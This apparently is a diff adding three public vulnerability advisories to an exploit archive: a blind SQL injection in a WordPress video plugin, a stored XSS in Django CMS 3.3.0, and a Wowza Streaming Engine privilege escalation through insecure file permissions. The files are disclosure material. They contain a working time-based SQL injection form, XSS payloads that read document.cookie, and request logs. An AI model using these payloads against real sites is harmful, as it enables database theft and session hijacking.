+This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.
+
+OVE ID
+
+OVE-20160712-0004
+
+Tested versions
+
+This issue was successfully tested on WordPress Video Player WordPress plugin version 1.5.16.
+
+Fix
+
+This issue is resolved in WordPress Video Player 1.5.18.
+
+Introduction
+
+WordPress Video Player is a WordPress video plugin that allows you to easily add videos to your website. WordPress Video Player is affected by multiple blind SQL injection vulnerabilities. Using these issues it is possible for a logged on Contributor (or higher) to extract arbitrary data (eg, the Administrator's password hash) from the WordPress database.
+
+Details
+
+The vulnerabilities exist in the functions show_tag(), spider_video_select_playlist(), and spider_video_select_video(). The author tried to prevent SQL injection by calling the esc_sql() WordPress function. However, the user input is used in the ORDER BY clause and is consequently not quoted. Due to this it is possible to inject arbitrary SQL statements despite the use of esc_sql()
+
+show_tag():
+
+[...]
+   
+if (isset($_POST['page_number'])) {
+   if ($_POST['asc_or_desc']) {
+      $sort["sortid_by"] = esc_sql(esc_html(stripslashes($_POST['order_by'])));
+      if ($_POST['asc_or_desc'] == 1) {
+         $sort["custom_style"] = "manage-column column-title sorted asc";
+         $sort["1_or_2"] = "2";
+         $order = "ORDER BY " . $sort["sortid_by"] . " ASC";
+      } else {
+         $sort["custom_style"] = "manage-column column-title sorted desc";
+         $sort["1_or_2"] = "1";
+         $order = "ORDER BY " . $sort["sortid_by"] . " DESC";
+      }
+   }
+
+
+spider_video_select_playlist():
+[...]
+if(isset($_POST['page_number']))
+{
+   if($_POST['asc_or_desc'])
+   {
+      $sort["sortid_by"]=esc_sql(esc_html(stripslashes($_POST['order_by'])));
+      if($_POST['asc_or_desc']==1)
+      {
+         $sort["custom_style"]="manage-column column-title sorted asc";
+         $sort["1_or_2"]="2";
+         $order="ORDER BY ".$sort["sortid_by"]." ASC";
+      }
+      else
+      {
+         $sort["custom_style"]="manage-column column-title sorted desc";
+         $sort["1_or_2"]="1";
+         $order="ORDER BY ".$sort["sortid_by"]." DESC";
+      }
+   }
+function spider_video_select_video():
+
+[...]
+   
+if(isset($_POST['page_number']))
+{
+      if($_POST['asc_or_desc'])
+      {
+         $sort["sortid_by"]=esc_html(stripslashes($_POST['order_by']));
+         if($_POST['asc_or_desc']==1)
+         {
+            $sort["custom_style"]="manage-column column-title sorted asc";
+            $sort["1_or_2"]="2";
+            $order="ORDER BY ".esc_sql($sort["sortid_by"])." ASC";
+         }
+         else
+         {
+            $sort["custom_style"]="manage-column column-title sorted desc";
+            $sort["1_or_2"]="1";
+            $order="ORDER BY ".esc_sql($sort["sortid_by"])." DESC";
+         }
+      }
+Proof of concept
+-->
+
+<html>
+   <body>
+      <form action="http://<target>/wp-admin/admin-ajax.php?action=spiderVeideoPlayerselectplaylist" method="POST">
+         <input type="hidden" name="search_events_by_title" value="" />
+         <input type="hidden" name="page_number" value="0" />
+         <input type="hidden" name="serch_or_not" value="" />
+         <input type="hidden" name="asc_or_desc" value="1" />
+         <input type="hidden" name="order_by" value="(CASE WHEN (SELECT sleep(10)) = 1 THEN id ELSE title END) ASC #" />
+         <input type="hidden" name="option" value="com_Spider_Video_Player" />
+         <input type="hidden" name="task" value="select_playlist" />
+         <input type="hidden" name="boxchecked" value="0" />
+         <input type="hidden" name="filter_order_playlist" value="" />
+         <input type="hidden" name="filter_order_Dir_playlist" value="" />
+         <input type="submit" value="Submit request" />
+      </form>
+   </body>
+</html>
diff --git a/platforms/python/webapps/40129.txt b/platforms/python/webapps/40129.txt
new file mode 100755
index 000000000..eb5a271ee
--- /dev/null
+++ b/platforms/python/webapps/40129.txt
@@ -0,0 +1,349 @@
+Document Title:
+===============
+Django CMS v3.3.0 - (Editor Snippet) Persistent Web Vulnerability
+
+
+References (Source):
+====================
+http://www.vulnerability-lab.com/get_content.php?id=1869
+
+Security Release: https://www.djangoproject.com/weblog/2016/jul/18/security-releases/
+
+http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-6186
+
+CVE-ID:
+=======
+CVE-2016-6186
+
+
+Release Date:
+=============
+2016-07-19
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+1869
+
+
+Common Vulnerability Scoring System:
+====================================
+3.5
+
+
+Product & Service Introduction:
+===============================
+django CMS is a modern web publishing platform built with Django, the web application framework for perfectionists with deadlines.
+django CMS offers out-of-the-box support for the common features you’d expect from a CMS, but can also be easily customised and 
+extended by developers to create a site that is tailored to their precise needs.
+
+(Copy of the Homepage: http://docs.django-cms.org/en/release-3.3.x/upgrade/3.3.html )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered an application-side vulnerability (CVE-2016-6186) in the official Django v3.3.0 Content Management System.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2016-07-03: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH)
+2016-07-04 Vendor Notification (Django Security Team)
+2016-07-07: Vendor Response/Feedback (Django Security Team)
+2016-07-18: Vendor Fix/Patch (Django Service Developer Team)
+2016-07-19: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+Divio AG
+Product: Django Framework - Content Management System 3.3.0
+
+Divio AG
+Product: Django Framework - Content Management System MDB, 1.10, 1.9, 1.8 and 1.7
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Technical Details & Description:
+================================
+A persistent input validation web vulnerability has been discovered in the official Django v3.3.0 Content Management System.
+The security vulnerability allows remote attackers or privileged user accounts to inject own malicious script codes to the 
+application-side of the vulnerable modules web context.
+
+The persistent web vulnerability is located in the `Name` value of the `Editors - Code Snippet` module POST method request. 
+Remote attackers are able to inject own malicious script code to the snippets name input field to provoke a persistent execution. 
+The injection point is the snippets add module of the editor. The execution point occurs in the `./djangocms_snippet/snippet/` 
+data listing after the add. The data context is not escaped or parsed on add to select and thus results in an execute of any 
+payload inside of the option tag.
+
+The attacker vector of the vulnerability is persistent because of the data is stored on add and request method to inject is POST.
+The vulnerability can be exploited against other privileged user accounts of the django application by interaction with already 
+existing snippets on add. 
+
+Already added elements become visible for the other user accounts as well on add interaction. The unescaped data is stored in 
+the database of the web-application but when rendered in the frontend or in the edit mode, it's properly escaped.
+
+The security risk of the vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.5. 
+Exploitation of the vulnerability requires a low privileged web-application user account and only low user interaction. 
+Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external 
+redirects to malicious source and persistent manipulation of affected or connected application modules.
+
+Request Method(s):
+				[+] POST
+
+Vulnerable Module(s):
+				[+] Editor - Snippets (Add)
+
+Vulnerable Input(s):
+				[+] Name
+
+Parameter(s):
+				[+] select
+
+Affected Module(s):
+				[+] Snippets Options Listing [./djangocms_snippet/snippet/] - option
+
+
+Proof of Concept (PoC):
+=======================
+The application-side validation web vulnerability can be exploited by low and high privileged web-application user accounts with low user interaction.
+For security demonstration or to reproduce the application-side web vulnerability follow the provided information and steps below to continue.
+
+Manual steps to reproduce the vulnerability ...
+1. Login to your django cms website with version 3.3.0
+2. Open the structure module
+3. Click to edit a page module
+Note: Now the editor opens with the main default plugins
+4. Mark a text passage and click to the code snippets plugin that is configured by default installation
+5. Click the plus to add a new snippet of code
+6. Inject a script code payload in java-script to the input field of the Name
+7. Save the entry iva POST method request
+8. Now click the box to choose the vulnerable injected payload
+9. The script code payload executes in the box listing without secure parse or filter to encode
+10. Successful reproduce of the application-side validation vulnerability in the editors snippet module!
+
+Note: 
+Multiple accounts can be exploited by the inject of snippets. When another privileged user account includes a snippet 
+the stable saved categories provoke the execution of the payload.
+
+
+
+PoC: Snippet Module [./djangocms_snippet/snippet/] (Execution Point) <select> <option>
+...
+<fieldset class="module aligned ">
+<div class="form-row field-snippet">
+<div>        
+<label class="required" for="id_snippet">Snippet:</label>                    
+<div class="related-widget-wrapper">
+<select id="id_snippet" name="snippet">
+<option value="">---------</option>
+<option value="3" selected="selected">"><"<img src="x">%20%20>"<iframe src="a">%20<iframe>  
+"><"<img src="x">%20%20>"<iframe src=http://www.vulnerability-lab.com onload=alert(document.cookie)<>[PERSISTENT SCRIPT CODE EXECUTION VIA SNIPPET NAME!]%20<iframe></iframe></option>
+<option value="1">Social AddThis</option>
+<option value="2">tour "><"<img src="x">%20%20>"<iframe src=a>%20<iframe></option>
+</select> 
+<a href="/en/admin/djangocms_snippet/snippet/3/?_to_field=id&_popup=1" class="related-widget-wrapper-link change-related" 
+id="change_id_snippet" data-href-template="/en/admin/djangocms_snippet/snippet/__fk__/?_to_field=id&_popup=1" title="Change selected Snippet">
+<img src="/static/admin/img/icon_changelink.gif" alt="Change" height="10" width="10">
+</a>
+<a class="related-widget-wrapper-link add-related" id="add_id_snippet" href="/en/admin/djangocms_snippet/snippet/add/?_to_field=id&_popup=1" title="Add another Snippet">
+<img src="/static/admin/img/icon_addlink.gif" alt="Add" height="10" width="10">
+</a>
+</div>
+</div>
+</div>
+</fieldset>
+...
+
+
+
+--- PoC Session Logs [POST] (Injection) [GET] (Execution) ---
+Status: 200[OK]
+POST http://django3-3-0.localhost:8080/en/admin/djangocms_snippet/snippet/2/?_to_field=id&_popup=1 
+   Request Header:    
+  Host[django3-3-0.localhost:8080]
+      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0]
+      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+      Referer[http://django3-3-0.localhost:8080/en/admin/djangocms_snippet/snippet/2/?_to_field=id&_popup=1]
+      Cookie[csrftoken=LSAWc8qD0fUpl1Yz11W8FMfLPYSo6Dwm; sessionid=eg4ycotyuzu144c85qd9ve12jwn1ob21; django_language=en]
+Connection[keep-alive]
+POST-Daten:
+POSTDATA =-----------------------------30880199939743
+Content-Disposition: form-data; name="csrfmiddlewaretoken"
+LSAWc8qD0fUpl1Yz11W8FMfLPYSo6Dwm
+-----------------------------30880199939743
+Content-Disposition: form-data; name="_popup"
+1
+-----------------------------30880199939743
+Content-Disposition: form-data; name="_to_field"
+id
+-----------------------------30880199939743
+Content-Disposition: form-data; name="name"
+test <img src="x">%20%20>"<iframe src="a">%20<iframe>  
+"><"<img src="x">%20%20>"<iframe src=a>[PERSISTENT INJECTED SCRIPT CODE VIA SNIPPET NAME!]%20<iframe>
+-----------------------------30880199939743
+Content-Disposition: form-data; name="html"
+sd
+-----------------------------30880199939743
+Content-Disposition: form-data; name="template"
+aldryn_tour/tour.html 
+-----------------------------30880199939743
+Content-Disposition: form-data; name="slug"
+tour
+-----------------------------30880199939743
+Content-Disposition: form-data; name="_save"
+Save
+-----------------------------30880199939743-- 
+Response Header:
+      Transfer-Encoding[chunked]
+      X-Proxy-Request-Received[0]
+      Server[Aldryn-LoadBalancer/2.0]
+      Date[Mon, 04 Jul 2016 09:34:19 GMT]
+      X-Aldryn-App[django-cms-3-3-demo-sopegose-stage]
+      Content-Language[en]
+      Expires[Mon, 04 Jul 2016 09:34:19 GMT]
+      Vary[Cookie]
+      Last-Modified[Mon, 04 Jul 2016 09:34:19 GMT]
+      Cache-Control[no-cache, no-store, must-revalidate, max-age=0]
+      X-Frame-Options[SAMEORIGIN]
+      Content-Type[text/html; charset=utf-8]
+      Set-Cookie[sessionid=eg4ycotyuzu144c85qd9ve12jwn1ob21; expires=Mon, 18-Jul-2016 09:34:19 GMT; Max-Age=1209600; Path=/]
+-
+Status: 301[MOVED PERMANENTLY]
+GET http://django3-3-0.localhost:8080/en/admin/cms/staticplaceholder/add-plugin/x[PERSISTENT SCRIPT CODE EXECUTION VIA SNIPPET NAME!] 
+   Request Header:
+      Host[django3-3-0.localhost:8080]   
+   User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0]
+      Accept[*/*]
+      Accept-Language[de,en-US;q=0.7,en;q=0.3]
+      Accept-Encoding[gzip, deflate]
+      Referer[http://django3-3-0.localhost:8080/en/admin/cms/staticplaceholder/add-plugin/?placeholder_id=6&plugin_type=SnippetPlugin&plugin_parent=9&plugin_language=en]
+      Cookie[csrftoken=LSAWc8qD0fUpl1Yz11W8FMfLPYSo6Dwm; sessionid=eg4ycotyuzu144c85qd9ve12jwn1ob21; django_language=en]
+      Connection[keep-alive]
+   Response Header:
+      Server[Aldryn-LoadBalancer/2.0]
+      Date[Mon, 04 Jul 2016 09:34:19 GMT]
+      Vary[Cookie]
+      X-Frame-Options[SAMEORIGIN]
+      Content-Type[text/html; charset=utf-8]
+      Location[http://django3-3-0.localhost:8080/en/admin/cms/staticplaceholder/add-plugin/x/]
+      Content-Language[en]
+-
+Status: 200[OK]
+GET http://django3-3-0.localhost:8080/en/admin/cms/staticplaceholder/add-plugin/a/[PERSISTENT SCRIPT CODE EXECUTION VIA SNIPPET NAME!]
+   Request Header:
+      Host[django3-3-0.localhost:8080]
+      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0]
+      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+      Accept-Language[de,en-US;q=0.7,en;q=0.3]
+      Accept-Encoding[gzip, deflate]
+      Referer[http://django3-3-0.localhost:8080/en/admin/cms/staticplaceholder/add-plugin/?placeholder_id=6&plugin_type=SnippetPlugin&plugin_parent=9&plugin_language=en]
+      Cookie[csrftoken=LSAWc8qD0fUpl1Yz11W8FMfLPYSo6Dwm; sessionid=eg4ycotyuzu144c85qd9ve12jwn1ob21; django_language=en]
+      Connection[keep-alive]
+   Response Header:
+      Transfer-Encoding[chunked]
+      X-Proxy-Request-Received[0]
+      Server[Aldryn-LoadBalancer/2.0]
+      Date[Mon, 04 Jul 2016 09:34:19 GMT]
+      Content-Language[en]
+      Expires[Mon, 04 Jul 2016 09:34:19 GMT]
+      Vary[Cookie]
+      Last-Modified[Mon, 04 Jul 2016 09:34:19 GMT]
+      Cache-Control[no-cache, no-store, must-revalidate, max-age=0]
+      X-Frame-Options[SAMEORIGIN]
+	Content-Type[text/html]
+
+
+Reference(s):
+http://django3-3-0.localhost:8080/
+http://django3-3-0.localhost:8080/en/
+http://django3-3-0.localhost:8080/en/admin/
+http://django3-3-0.localhost:8080/en/admin/cms/
+http://django3-3-0.localhost:8080/en/admin/cms/staticplaceholder/
+http://django3-3-0.localhost:8080/en/admin/djangocms_snippet/snippet/
+http://django3-3-0.localhost:8080/en/admin/djangocms_snippet/snippet/2/
+http://django3-3-0.localhost:8080/en/admin/cms/staticplaceholder/add-plugin/
+http://django3-3-0.localhost:8080/en/admin/cms/staticplaceholder/edit-plugin/
+http://django3-3-0.localhost:8080/en/admin/cms/staticplaceholder/edit-plugin/9/
+
+
+Solution - Fix & Patch:
+=======================
+The vulnerability can be patched by a secure parse of the vulnerable Name input field in the add snippets editor module.
+Restrict the input and disallow the usage of special chars. Escape the entries in case of emergency and use plain-text values.
+Encode in the snippets module listing the vulnerable box with the name listing to prevent the execution point of the vulnerability.
+
+Resolution:
+Patches to resolve the issues have been applied to Django's master development branch and the 1.10, 1.9, and 1.8 release branches. 
+The patches may be obtained from the following changesets:
+
+-    On the development master branch
+-    On the 1.10 release branch
+-    On the 1.9 release branch
+-    On the 1.8 release branch
+
+The following new releases have been issued:
+
+-    Django 1.10rc1
+-    Django 1.9.8
+-    Django 1.8.14
+
+Reference(s):
+https://developer.mozilla.org/en-US/docs/Web/API/element/innerHTML
+
+
+Security Risk:
+==============
+The security risk of the application-side input validation web vulnerability in the django cms is estimated as medium. (CVSS 3.5)
+
+
+Credits & Authors:
+==================
+Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, 
+including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, 
+including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised 
+of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing 
+limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
+
+Domains:    www.vulnerability-lab.com 		- www.vuln-lab.com 						- www.evolution-sec.com
+Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 				- admin@evolution-sec.com
+Section:    magazine.vulnerability-lab.com 	- vulnerability-lab.com/contact.php 				- evolution-sec.com/contact
+Social:	    twitter.com/vuln_lab		- facebook.com/VulnerabilityLab 				- youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php 	- vulnerability-lab.com/rss/rss_upcoming.php 			- vulnerability-lab.com/rss/rss_news.php
+Programs:   vulnerability-lab.com/submit.php 	- vulnerability-lab.com/list-of-bug-bounty-programs.php 	- vulnerability-lab.com/register.php
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically 
+redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or 
+its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific 
+authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@vulnerability-lab.com) to get a ask permission.
+
+				    Copyright © 2016 | Vulnerability Laboratory - [Evolution Security GmbH]™
+
+
+
+
+-- 
+VULNERABILITY LABORATORY - RESEARCH TEAM
+SERVICE: www.vulnerability-lab.com
+CONTACT: research@vulnerability-lab.com
+
+
diff --git a/platforms/windows/local/40132.txt b/platforms/windows/local/40132.txt
new file mode 100755
index 000000000..65d171239
--- /dev/null
+++ b/platforms/windows/local/40132.txt
@@ -0,0 +1,84 @@
+Wowza Streaming Engine 4.5.0 Local Privilege Escalation
+
+
+Vendor: Wowza Media Systems, LLC.
+Product web page: https://www.wowza.com
+Affected version: Wowza Streaming Engine 4.5.0 (build 18676)
+                  Wowza Streaming Engine Manager 4.5.0 (build 18676)
+
+Summary: Wowza Streaming Engine is robust, customizable, and scalable
+server software that powers reliable video and audio streaming to any
+device. Learn the benefits of using Wowza Streaming Engine to deliver
+high-quality live and on-demand video content to any device.
+
+Desc: Wowza Streaming Engine suffers from an elevation of privileges
+vulnerability which can be used by a simple authenticated user that
+can change the executable file with a binary of choice. The vulnerability
+exist due to the improper permissions, with the 'F' flag (Full) for
+'Everyone' group. In combination with insecure file permissions the
+application suffers from an unquoted search path issue impacting the
+services 'WowzaStreamingEngine450' and 'WowzaStreamingEngineManager450'
+for Windows deployed as part of Wowza Streaming software.
+
+Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
+           Java Version: 1.8.0_77
+           Java VM Version: 25.77-b03
+           Java Architecture: 64
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2016-5339
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5339.php
+
+
+03.07.2016
+
+--
+
+
+C:\Users\lqwrm>sc qc WowzaStreamingEngineManager450
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: WowzaStreamingEngineManager450
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\Wowza Media Systems\Wowza Streaming Engine 4.5.0\manager\bin\nssm_x64.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : Wowza Streaming Engine Manager 4.5.0
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+C:\Users\lqwrm>cacls "C:\Program Files (x86)\Wowza Media Systems\Wowza Streaming Engine 4.5.0\manager\bin\nssm_x64.exe"
+C:\Program Files (x86)\Wowza Media Systems\Wowza Streaming Engine 4.5.0\manager\bin\nssm_x64.exe Everyone:(ID)F
+                                                                                                 NT AUTHORITY\SYSTEM:(ID)F
+                                                                                                 BUILTIN\Administrators:(ID)F
+                                                                                                 BUILTIN\Users:(ID)R
+
+==========
+
+C:\Users\lqwrm>sc qc WowzaStreamingEngine450
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: WowzaStreamingEngine450
+        TYPE               : 10  WIN32_OWN_PROCESS
+        START_TYPE         : 2   AUTO_START  (DELAYED)
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Program Files (x86)\Wowza Media Systems\Wowza Streaming Engine 4.5.0\bin\nssm_x64.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : Wowza Streaming Engine 4.5.0
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+C:\Users\lqwrm>icacls "C:\Program Files (x86)\Wowza Media Systems\Wowza Streaming Engine 4.5.0\bin\nssm_x64.exe"
+C:\Program Files (x86)\Wowza Media Systems\Wowza Streaming Engine 4.5.0\bin\nssm_x64.exe Everyone:(I)(F)
+                                                                                         NT AUTHORITY\SYSTEM:(I)(F)
+                                                                                         BUILTIN\Administrators:(I)(F)
+                                                                                         BUILTIN\Users:(I)(RX)
+
+Successfully processed 1 files; Failed processing 0 files